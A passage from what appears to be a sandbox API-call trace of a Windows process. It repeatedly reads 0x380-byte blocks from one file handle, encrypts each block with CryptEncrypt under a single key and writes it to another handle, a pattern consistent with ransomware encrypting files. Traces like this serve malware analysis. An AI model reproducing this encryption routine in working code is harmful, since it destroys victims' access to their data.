lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.321] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.321] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.321] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.321] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.322] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.322] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.322] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.322] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.322] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.322] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.322] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.322] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.322] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.322] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.322] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.322] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.322] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.322] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.322] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.322] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.322] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.323] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.323] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.323] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.323] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.323] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.323] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.323] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.323] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.323] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.323] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.323] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.323] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.323] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.323] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.323] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.323] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.324] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.324] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.324] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.324] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.324] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.324] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.324] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.324] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.324] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.324] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.324] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.324] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.324] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.324] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.324] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.324] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.324] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.325] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.325] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.325] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.325] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.325] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.325] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.325] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.325] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.325] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.325] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.325] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.325] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.325] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.325] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.325] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.325] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.326] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.326] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.326] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.326] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.326] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.326] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.326] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.326] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.326] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.326] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.326] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.326] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.326] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.326] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.326] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.326] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.326] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.327] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.327] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.327] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.327] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.327] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.327] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.327] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.327] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.327] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.327] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.327] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.327] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.327] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.327] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.327] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, 